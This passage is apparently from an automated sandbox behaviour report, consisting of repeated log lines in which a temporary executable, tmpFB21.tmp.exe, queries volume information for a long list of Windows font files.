            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
